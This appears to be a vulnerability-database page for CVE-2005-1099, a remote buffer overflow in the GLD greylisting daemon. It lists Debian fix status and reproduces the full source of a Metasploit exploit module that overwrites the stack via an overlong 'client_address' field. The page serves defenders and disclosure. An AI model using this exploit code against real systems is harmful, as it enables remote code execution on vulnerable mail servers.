CVE-2005-1099
Description
Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
Mitigation details
CVE-2005-1099 NameCVE-2005-1099 DescriptionMultiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code. SourceCVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web…
CVE-2005-1099
| Name | CVE-2005-1099 |
| Description | Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code. |
| Source | CVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more) |
Vulnerable and fixed packages
The table below lists information on source packages.
| Source Package | Release | Version | Status |
|---|---|---|---|
| postfix-gld (PTS) | bullseye | 1.7-8 | fixed |
| bookworm | 1.7-9 | fixed | |
| trixie | 1.7-11 | fixed | |
| forky, sid | 1.7-12 | fixed |
The information below is based on the following data on fixed versions.
| Package | Type | Release | Fixed Version | Urgency | Origin | Debian Bugs |
|---|---|---|---|---|---|---|
| postfix-gld | source | (unstable) | 1.5-1 |
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)
##
# $Id: gld_postfix.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Salim Gasmi
GLD <= 1.4 greylisting daemon for Postfix. By sending an
overly long string the stack can be overwritten.
},
'Version' => '$Revision: 9669 $',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20=",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 12 2005'
))
register_options(
[
Opt::RPORT(2525)
],
self.class
)
end
def exploit
connect
sploit = "sender="+ payload.encoded + "\r\n"
sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"
sock.put(sploit)
handler
disconnect
end
endSalim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow
Metasploit modules
OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 1.5-1 |
| sid | Fixed | 1.5-1 |
| forky | Fixed | 1.5-1 |
| bullseye | Fixed | 1.5-1 |
| bookworm | Fixed | 1.5-1 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.